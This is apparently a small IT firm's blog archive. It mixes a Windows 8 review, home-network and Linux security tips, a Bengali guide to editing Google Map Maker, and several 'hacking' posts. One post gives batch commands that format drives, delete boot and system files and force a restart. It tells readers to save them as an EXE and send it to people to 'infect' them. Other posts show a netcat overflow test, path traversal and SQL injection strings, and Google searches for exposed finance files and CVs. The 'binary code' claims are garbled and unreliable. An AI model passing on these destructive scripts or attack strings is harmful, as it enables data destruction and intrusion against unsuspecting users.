Our Vision

To give customers the most compelling IT Support experience possible.

Our Mission

Our mission is simple: make technology an asset for your business not a problem.

Our Values

We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, when your business grows ours will grow with you, therefore, we will work hand in hand with you to support your growth.

Our Values

We develop relationship that makes a positive difference in our customers Business.

Our Values

We exibit a strong will to win in the marketplace and in every aspect of our Business

Wednesday, January 11, 2012

Input Validation Attacks :-

Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.

The most common input validation attacks are as follows-

1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.

To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.

Here’s the buffer test, calling on Perl from the command line:

$ echo –e “GET /login.php?user=\

> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \

nc –vv website 80

This sends a string of 500 “a” characters for the user value to the login.php file.

Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.

2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-






3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.

We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:


This displays a custom access denied page that says, “Invalid password”. Seeing a string

on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:

That is, place the script tags on the URL.

4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted.
The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server.
example:- http://www.domain.com/index.asp?querystring=sports' or 1=1--

Shutdown Command Via Command Prompt :-

The 'Shutdown' Command Becomes More Flexible and Automated when used from the Command Prompt.

To Run the 'Shutdown' command from the command prompt, go to 'Start > Run', type 'cmd', and press 'Enter'.

In the black box (the command prompt) type 'Shutdown' and the Switches you want to use with the 'Shutdown' command.

You have to use at least one switch for the shutdown command to work.

The Switches :- The 'Shutdown' command has a few options called Switches. You can always see them by typing 'shutdown -?' in the command prompt if you forget any of them.

-i: Display GUI interface, must be the first option

-l: Log off (cannot be used with -m option)

-s: Shutdown the computer

-r: Shutdown and restart the computer

-a: Abort a system shutdown

-m \\computername: Remote computer to shutdown/restart/abort

-t xx: Set timeout for shutdown to xx seconds

-c “comment”: Shutdown comment (maximum of 127 characters)

-f: Forces running applications to close without warning

-d [u][p]:xx:yy: The reason code for the shutdown u is the user code p is a planned shutdown code xx is the major reason code (positive integer less than 256) yy is the minor reason code (positive integer less than 65536)

Note :- I’ve noticed using a switch with a '-' sign doesn’t work sometimes.

If you are having trouble try using a '/' in place of '-' in your switches.

Examples :- shutdown –m \\computername –r –f

This command will restart the computer named computername and force any programs that might still be running to stop.

shutdown –m \\computername –r –f –c “I’m restarting your computer. Please save your work now.” –t 120

This command will restart the computer named computername, force any programs that might still be running to stop, give to user on that computer a message, and countdown 120 seconds before it restarts.

shutdown –m \\computername –a

This command will abort a previous shutdown command that is in progress.

Using A Batch File :-

You can create a file that performs the shutdown command on many computers at one time. In this example I’m going to create a batch file that will use the shutdown command to shut down 3 computers on my home network before I go to bed.

Open 'Notepad' and type the shutdown command to shut down a computer for each computer on the network.

Make sure each shutdown command is on its own line.

An example of what should be typed in notepad is given below-

shutdown –m \\computer1 –s

shutdown –m \\computer2 –s

shutdown –m \\computer3 -s

Now I’ll save it as a batch file by going to file, save as, change save as type to all files, give the file a name ending with '.bat'. I named mine 'shutdown.bat'.

Pick the location to save the batch file in and save it.

When you run the batch file it’ll shutdown computer 1, 2, and 3 for you.

You can use any combination of shutdown commands in a batch file.

Tuesday, January 10, 2012

Tips for Wireless Home Network Security

1) Change Default Administrator Passwords (and Usernames)

2) Turn on (Compatible) WPA / WEP Encryption

3) Change the Default SSID

4) Disable SSID Broadcast

5) Assign Static IP Addresses to Devices

6) Enable MAC Address Filtering

7) Turn Off the Network During Extended Periods of Non-Use

8) Position the Router or Access Point Safely

Monday, January 9, 2012

Google Hacking :-

Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.

2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.

3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".

Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.

intitle:"index of" returns all pages that have string "index of" in their title.

Companion operator:- "allintitle".

2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches, where url of searched pages must contains the word "admin".

Companion operator:- "allinurl".

3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com

4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com

5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com

6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" in different manner from all over the world.

7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
"inurl:www.microsoft.com filetype:txt"

Google Search :- "Active Webcam Page" inurl:8080 Description- Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting.

Google Search :- "delete entries" inurl:admin/delete.asp Description- AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.

Google Search :- "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
Description- This search gives hundreds of existing curriculum vitae with names and address. An attacker could steal identity if there is an SSN in the document.

Google Search :- intitle:"index of" finance.xls Description- Secret financial spreadsheets 'finance.xls' or 'finances.xls' of companies may revealed by this query.

Google Search :- intitle:"index.of" robots.txt Description- The robots.txt file contains "rules" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff. However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!

Google Search :- intitle:index.of.admin Description- Locate "admin" directories that are accessible from directory listings.

Google Search :- inurl:"nph-proxy.cgi" "start browsing" Description- Returns lots of proxy servers that protects your identity online.

-: Folder Lock Without Any Software :-

Folder Lock With Password Without Any Software-

Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').

Any name will do.

Then you see a batch file. Double click on this batch file to create a folder locker.

New folder named 'Locker' would be formed at the same location.

Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.

If you want to unlock your files,double click the batch file again and you would be prompted for password.

Enter the password and enjoy access to the folder.

if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK



echo Are you sure u want to Lock the folder(Y/N)

set/p "cho=>"

if %cho%==Y goto LOCK

if %cho%==y goto LOCK

if %cho%==n goto END

if %cho%==N goto END

echo Invalid choice.



ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

echo Folder locked

goto End


echo Enter password to Unlock folder

set/p "pass=>"

if NOT %pass%==type your password here goto FAIL

attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"

ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker

echo Folder Unlocked successfully

goto End


echo Invalid password

goto end


md Locker

echo Locker created successfully

Sunday, January 8, 2012

If you think that Notepad is useless ???

If you think that Notepad is useless then you are wrong because you can now do a lot of things with the Notepad which you could have never imagined. In this hack I will show you how to format a HDD using Notepad. This is really cool.

Step 1 :-
Copy The Following In Notepad Exactly as it is.


Step 2 :- Save As An EXE Any Name Will Do

Step 3 :- Send the EXE to People And Infect


IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code

format c:\ /Q/X — this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100


format d:\ /Q/X — this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100

del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001

try to figure out urself rest

cant spoonfeed

its working

Do not try it on your PC. Don’t mess around this is for educational purpose only

still if you cant figure it out try this go to notepad and type the following:

@Echo off

Del C:\ *.*|y

save it as Dell.bat

want worse then type the following:

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

and save it as a .bat file

Firewalls are your guardian angels.

First of all, keep a software firewall active on your system, and restrict access to ports that allow remote access into your system, a good idea is to allow only a few select hosts access to ports used by services such as ssh (port 22) or telnet (port 23). Keeping a firewall in place ensures that you alone dictate who gets to access remote services on your computer and who doesn’t. To set up a firewall in linux, you can use the iptables program which comes standard with most linux distributions. However, iptables is quite difficult and complicated to set up correctly, and you will need to spend some time fiddling with the command line, but it is very flexible and powerful once configured correctly.

If messing about with iptables dosen’t appeal to you, there are frontends to iptables that you can use to set up effective firewalls. One such frontend is ufw (uncomplicated firewall) this program comes standard on ubuntu and is quite simple to set up, to use it you first have to enable it by typing in ’sudo enable ufw’ in the terminal, once the ufw service is active, adding rules is as simple as ’sudo allow 22/tcp’ > this statement allows all tcp traffic on port 22, swap allow for deny and you have the ssh service blocked, Its that simple, much easier than mucking about with iptables.

Of course, there are many people who do not like the idea of using command-line programs and like all their apps to be graphical. If you prefer a GUI configured firewall, then firestarter is the choice for you. Firestarter is a breeze to use, and has good documentation available on the firestarter website.

2) Passwords are for your protection, choose them well

Choose good user passwords, especially for root. One way to choose a secure password is to take a sentence, reduce it to an acronym and then replace some letters of the acronym with symbols and add some numbers to it. this mixing of alphabets, numbers and symbols, along with its long length will be a strong password.

Never use actual words that have meaning as passwords. These types of passwords are weak and can be cracked using dictionary attacks. Also along those lines: Never use words that hold personal significance with you.. i.e don’t use passwords that people who know you will be inclined to think that you would use, like a favorite pet’s name.. etc.

And for god’s sake, don’t use the word ‘password’ as a password…. ( don’t laugh… thats one of the most common passwords .. )

3) Use antivirus

Yeaps you read right.. antivirus. Antivirus on linux you say? Yes, linux has antivirus suites as well , but this is more for cleaning off your thumbdrives that you may have used in an infected windows machine than for killing linux viruses, as the system of user permissions for executing files makes linux a very inhospitable place for computer viruses to live. clamAV is a good antivirus choice, with a GUI version available for most major distros.

4) Be careful what scripts you get off the net
Getting bash scripts off the net is convenient, but be careful what scripts you run on your system, and make sure you check them out first. If you suspect that a script you got has some nasty intentions behind it, but you do not have the expertise in bash scripting to be sure, post the script in text form on linux support forums and the community will help you out. Unfortunatly, there are idiots out there who write destructive shell scripts and release them into the wilds of the internet, in this case intuition is your best defence.

5) Encrypt sensitive data that you may have.
The concept behind encryption is relatively simple, make the data to be encrypted unreadable to anybody besides authorised users.

My favourite program for encrypting data on linux AND windows would have to be truecrypt. Truecrypt works by creating a virtual volume which you can then set a passphrase or security key to. When you mount the virtual volume, you can then add files to it, which will be totally encrypted and unviewable once unmounted. The only way to mount the drive is to supply the passphrase or key.

6)Keep your BIOS set to boot from your harddrive and then add a password to your bios.

This is to keep people from booting off from live CDs and cracking your password from them. Although it is relatively easy to reset the BIOS password, this should be at least a minor detterance to those who may try this cracking method.

Well, there you go.. hopefully you wil use these tips and make your system a safer box to work on.

Password Hacking :-

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.

Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.

If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.

One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.

LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.

2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of Facebook and MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.

A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.

Check Your Password Strength

3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.

Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.

Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.

Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.

Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.

However, cracking usually designates a guessing attack.

Thursday, September 22, 2011

গুগল ম্যাপ এডিট করতে শিখুনঃ দেশের জন্য অবদান রাখুন

গুগল ম্যাপ। ডিজিটাল যোগাযোগ ব্যবস্থার এক অনন্য নাম ! জিপিএস ছাড়া উন্নত বিশ্বের দৈনন্দিন জীবন অচল। কিন্তু আমাদের দেশে অবহেলিত! দেশের ডিজিটাল ম্যাপিং এর অবস্থা খুব করুন। অনেক দেশে শুধু ব্যবহারকারীদের অবদানের জন্য নগরীগুলো ডিজিটাল ম্যাপিং এর সবোর্চ্চ শিখরে পৌছেছে। কিন্তু আমাদের দেশে কনট্রিবিউটর খুব কম। চলুন আমরা সবাই দেশকে ডিজিটাল বানাতে অবদান রাখি, আর শিখে ফেলি কিভাবে ম্যাপ এডিট করতে হয়।


গুগল ম্যাপ এডিট খুব সহজ কাজ! নেট ব্যবহার করতে জানেন এমন কেউ আলাদা কোন প্রশিক্ষণ ছাড়াই গুগল ম্যাপে অবদান রাখতে পারবেন।
1. প্রথমে আপনার একটি জিমেইল একাউন্ট বা গুগল একাউন্ট লাগবে। একাউন্ট না থাকলে এখান থেকে তৈরী করে নিন
2. এবার গুগল ম্যাপ এডিটের এই লিংকে প্রবেশ করুন। http://www.google.com/mapmaker
ম্যাপ এডিটের বাটনগুলোর সাথে একনজরে পরিচিত হোন।

যেভাবে নতুন রাস্তা বানাবেনঃ

ধরুন আপনার বাসার পাশের রাস্তাটি গুগল ম্যাপে নেই, কিন্তু আপনি অ্যাড করে দিতে চাচ্ছেন। নিচে স্যাটেলাইট ভিউ থেকে একটি রাস্তা দেখা যাচ্ছে যেটি ম্যাপে নেই (আমরা অ্যাড করে দেব)

এই রাস্তাটি বানাতে প্রথমে 1 চিহ্নিত বাটনে ক্লিক করুন। তারপর 2 বাটন থেকে Road সিলেক্ট করুন।

প্রয়োজনে জুম করে নিন। এরপর মাউস দিয়ে ক্লিক করে করে রোডটি বানিয়ে ফেলুন।

সিলেক্ট করা হলে কিবোর্ডের Enter বাটন চাপুন। 1 নং ঘরে রোড এর নাম দিয়ে Save করুন! :D
বিঃদ্রঃ (নিজের নামে কোন রাস্তা বানাবেন না, এটি নিষিদ্ধ)
(ব্যাস রোড তৈরী হয়ে গেল! রোডটি কিন্তু সরারি ম্যাপে প্রকাশ পাবেনা। আপনি নতুন ইউজার হলে একজন গুগল রিভিউয়ার আপনার ম্যাপটি রিভিউ করে তারপর পাবলিশ করে দেবে। সাধারণত 2-1 দিন সময় লাগে রিভিউ পেতে। ম্যাপটি পাবলিশ হবার সাথে সাথেই যে মোবাইলের গুগল ম্যাপে রোডটি দেকতে পারবেন না নয়, 10-15 দিন পর পর লেটেস্ট সব আপডেট কে ম্যাপে সিনক্রোনাইজ করা হয়, তখন মোবাইলে আপনার রোডটি বিশ্বের সবাই দেকতে পারবে।)

যেভাবে কোন জায়গা (পার্ক/অফিস/রেস্টোরা) বানাবেনঃ

প্রথমে 1 চিহ্নিত জায়গায় ক্লিক করে 2 নং থেকে যা বানাবেন তা সিলেক্ট করুন। এখানে আমি একটি পার্ক (Park) বানাবো।

আগের মতই (1) মাউস দিয়ে প্রথমে এরিয়া সিলেক্ট করে দিন। এরপর (2) পার্কটির নাম দিয়ে দিন (3) এটি পার্কের এরিয়া না বিল্ডিং তা সিলেক্ট করুন (4) Save করুন।
বিঃদ্রঃ আপনার বাসা ম্যাপে যোগ করবেন না। এটি গুগল সমর্থন করেনা। মডারেটর ডিনাই করে দেবে, আপনার ম্যাপিং অ্যাকুরেসি রেটিং কমে যাবে। বিজনেস এরিয়া ও জনপ্রিয় স্থানগুলো যুক্ত করুন।

যেভাবে কোন রাস্তার নাম সংশোধন করবেনঃ

ধরুন আপনার এলাকার কোন রাস্তার নাম ভুলভাবে ম্যাপে রয়েছে। এটি সংশোধন করার জন্য (1) সিলেক্ট বাটনে ক্লিক করুন। এরপর যেই রাস্তাটি সংশোধন করবেন তার উপর ক্লিক করুন (2)। রাস্তাটি সিলেক্ট হয়ে যাবে।

এবার Edit এ ক্লিক করুন। এখান থেকে Edit entire (রোডের নাম) এ ক্লিক করুন।

(1) এ রোডের নামটি প্রবেশ করান (2) সেভ করুন। :D

যেভাবে ভুল রোড ডিলেট করবেনঃ

ধরুন আপনার এলাকার কোন রোড ভুলভাবে ম্যাপে এসেছে. বা রোডটি নেই কিন্তু ম্যাপে আছে এবং আপনি ডিরেট করতে চাচ্ছেন (সতর্কতার সাথে ডিলেট করুন, কারণ আসল রোড ডিলেট করলে ব্যবহারকারীরা অসুবিধায় পড়বে)।
রোডটি ডিলেট করতে  (1) সিলেক্ট বাটনে ক্লিক করুন, এরপর যেই রাস্তাটি ডিলেট করবেন তার উপর ক্লিক করুন। এবার (2) Edit মেনু থেকে Delete This এ ক্লিক করুন।

এবার রোডটি কেন ডিলেট করবেন তার কারণ সিলেক্ট করুন।

ব্যাস রোড ডিলেট হয়ে গেল! :D


  • গুগল ম্যাপ এডিটে প্রচুর ডাটা খরচ হয়। প্রিপেইড ব্যবহারকারীগণ এক্ষেত্রে সতর্ক থাকবেন।
  • নিখুঁত ও নির্ভুল তথ্য দিন, মনে রাখবেন আপনার দেয়া তথ্য হাজার হাজার মানুষের কাজে আসবে।
  • নতুন ব্যবহারকারী হিসেবে আপনার এডিট সরাসরি প্রকাশিত হবেনা, কিছু সময় লাগবে।
  • গুগল ম্যাপে আপনার এডিট প্রকাশ পেতে 10-15 দিন সময় লাগবে। (স্টাবল ভার্সনের জন্য)
দেশের জন্য অবদান রাখুন, দেশকে ডিজিটাল করুন। এই পোস্টটি নিজস্ব ব্লগ ও অন্যন্য কমিউনিটি ব্লগে ছড়িয়ে দিতে পারেন যাতে সকলে গুগল ম্যাপ এডিট করতে শিখে দেশের জন্য অবদান রাখতে পারে।

Windows 8 Review- A closer Look.

Windows 8
Finally Microsoft has unvail its brand new OS Windows 8 Developer Preview and allowing everyone to pre test it features and get the feel of it. At Maximus IT we are thrilled to let our reader know all about Windows 8 which just been unleased for testing,

Speed Tests: It’s Faster than windows 7 in almost every way, Firstly the boot time  -Windows 8's boot times were significantly faster than Windows 7's, Microsoft made a big effort in. I would get boot times more comparable to Windows 7, and sometimes it would be fast as testing on Virtual Box. We will wait and see how that changes in a year when the final version come up, but for right now, we're going to assume that this goal of fast boot times is resulting in some pretty hefty speed increases.

On the first startup on my HP Laptop , I had to give the computer a name, choose a Wi-Fi router, and configure settings.  after that it went to do recommended update and security options and by default it allowing programs to use my name, location, and user pictures.

Windows 8 Login Screen
Next step is setting up a Google Chrome and sign into or create a Windows Live account by this way your apps can connect with Microsoft cloud services like SkyDrive storage, Hotmail, and any other connected services you’ve connected—Facebook and twitter and LinkedIn accounts . Once logging in, the new Windows 8 took a couple minutes to prepare my Computer.

When I reboot and start up again, I saw the lock screen image, and next to it is my login screen. Windows 8 Developer Preview have an innovative new option in that is to create a  picture password  in which you touch and swipe parts of an image to log in. very cool yea.

Windows 8 Developer Preview is combined desktop, laptop and tablet operating system, it is designed to go from tablets to big screens, from portable notebooks to big gaming systems and business desktops.

We also tested Windows Phone 7 Metro-style touch interface of live tiles, the Metro programming model for building web apps and native apps that run full screen and share information. Its basically what you use every day on you smart phone making your computing experience similar.

Windows 8 another features is to put two apps on screen side by side, and the traditional Windows desktop for when you need richer apps like the ones we've been using in Windows for years.

Windows 8 interface: You can customise both the image you see on the Windows 8 Lock screen and the details of unread emails and missed instant messages that it shows. And you can pin desktop apps such as Office or Task Manager, and even a link to the desktop, to the Lock screen.You can group tiles together - giving groups a name or leaving them blank - and make any tile single or double width. Just swipe the tile up a little to get the option to change the size, unpin the app or uninstall it completely. You'll be able to do that for pre-installed Metro software too (which is what Microsoft is encouraging OEMs to bundle on new Windows 8 PCs).
Windows 8 Log in

As well as moving a tile to a new location by dragging it, you can also drag it up to the top of the screen with one finger and hold it there while you swipe across the screen to get to where you want to drop it - a much easier way of dealing with a long list of tiles. Future builds of Windows 8 will also enable you to pinch to zoom out so you can see all the tiles on screen at once, and rearrange groups at the same time.

Once you launch apps, you can use gestures to arrange them as you do in Nokia N8 or other Smart phones. Swiping from the left switches to the next app, but you can also swipe and drag to put two apps on a screen side by side - and one of those can be the Windows desktop.

Windows 8 Log in
Touch keyboard: Windows 8 has two touch keyboards for ultimate mobility and flexibility. An improved, full-sized touch keyboard with larger buttons and a unique thumb keyboard make it easy to use your computer on the go. Whether you’re walking around or sitting down, it’s more comfortable and natural to type using your thumbs when the keyboard is split.

The touch keyboard in Windows 8 includes several features to speed up your typing and make it more accurate. Improved keyboard technology is designed to minimize inaccurate key strokes while automatically correcting mistyped words without slowing you down. To make typing more efficient, Windows suggests words on screen as you type, allowing you to choose the suggested word with a single tap.

Your apps come with you:When you sign in with your connected Microsoft account to another PC running Windows 8, your Metro  style apps and settings go with you, so it’s just like you’re using your own PC. You’ll also be signed in to all of the websites you were signed in to. Your connected account is like a portable, personal PC that appears on any Windows 8-based PC you’re using. You’re always ready to pick back up where you left off no matter where you are.

Apps can work together: Apps can communicate with each other in Windows 8. So, if you want to send pictures in email, and they’re in different places like Facebook, Flickr, or on your hard drive, you can easily pick and send the ones you want. Windows 8 provides a single view.

Internet Explorer 10: the web by touch Metro style Internet Explorer 10 provides a fast and fluid touch-first browsing experience that’s all about your sites, making them feel increasingly more app-like. With faster performance, leading security protection, more hardware acceleration, and site-ready HTML5 support, IE10 continues to allow developers  to build a richer and more beautiful web.
Windows 8 in Virtual Box

More for power users: If you want to push the limits of your PC experience, we’ve invested in the features most often used by power users. We redesigned Windows Explorer and Task Manager to greatly enhance productivity, and developed new, flexible options for multi-monitor setups.
File management with ease: With enhanced Windows Explorer to make file navigation and common file management tasks straightforward. The ribbon organizes Explorer’s rich functionality, surfacing previously buried features and has new commands like ISO mounting and single-window move or copy. We’ve brought back a long-lost favourite: the Up button. We’ve also introduced a new enhanced copy experience so you can view and manage all of your file operations in one place.

Task Manager: The new Task Manager is your easy-to-use, all-in-one dashboard for monitoring and controlling your PC so you always know what’s going on with it. The information is presented in color-coded tiles to help draw your eye to items that are using the bulk of a resource. You can keep track of your system efficiently and in real-time, taking advantage of summary graphs and detailed information on processes, applications, and history. You can see the services associated with each process on one screen.
Windows 8 Task Manager

Security: Smart Screen filter: SmartScreen is a set of sophisticated technologies to help protect you from malicious websites and programs. Whether you’re downloading or running a new program on the desktop, Smart Screen has you covered. SmartScreen continues to provide protection from phishing and socially engineered malware attacks using URL and application reputation and removes unnecessary warnings for programs and publishers with an established reputation. To add another layer of protection, SmartScreen is now integrated with program launch to screen programs downloaded from the web. It also shows new warnings before higher-risk programs can run and will block known malware.

Windows Defender: To ensure legitimate antimalware protection to all users, Windows 8 provides Windows Defender. It monitors and protects against viruses and other malware in real time and detects and removes malware if your computer becomes infected. With Windows 8, third-party antimalware software becomes even more effective: by loading approved antimalware drivers during the boot process, antimalware software can start from a known good state and continue its vigilant watch over your PC from that point on.

Secured boot: Secured boot stops malware in its tracks and makes Windows 8 significantly more resistant to low-level attacks. Even when a virus has made it onto your PC, Windows will authenticate boot components to prevent any attempt to start malware before the operating system is up and running. If the component isn’t correctly signed by Microsoft, Windows will begin remediation and start the Windows Recovery Environment, which will automatically try to fix your operating system.

Microsoft Windows 8 System Requirements:
  • 1 gigahertz (GHz) or faster 32-bit (x86) or 64-bit (x64) processor
  • 1 gigabyte (GB) RAM (32-bit) or 2 GB RAM (64-bit)
  • 16 GB available hard disk space (32-bit) or 20 GB (64-bit)
  • DirectX 9 graphics device with WDDM 1.0 or higher driver
  • Taking advantage of touch input requires a screen that supports multi-touch

Download  Links: 

Sunday, August 7, 2011

Make Use of online teamwork and collaboration


Conceptboard is another great web app for online teamwork and collaboration.Among many features, you can draw directly on a board for your team to see, drag files directly on to your concept boards, write over your documents, leave comments easily for others to see, invite colleagues and clients to participate and even work on it using your iPad. The free account gives you a lot of options and is worth a look.

Got 15 minutes? Give Ruby a shot right now!

Got 15 minutes? Give Ruby a shot right now!

Ruby is a programming language from Japan (available at ruby-lang.org ) which is revolutionizing the web. The beauty of Ruby is found in its balance between simplicity and power.

http://tryruby.org is an extremely well produced site for anyone who is interested in learning about Ruby on Rails. It has a number of different lessons that teach you the basics in a new and interesting way. Enjoy.

Twitter Facebook Favorites More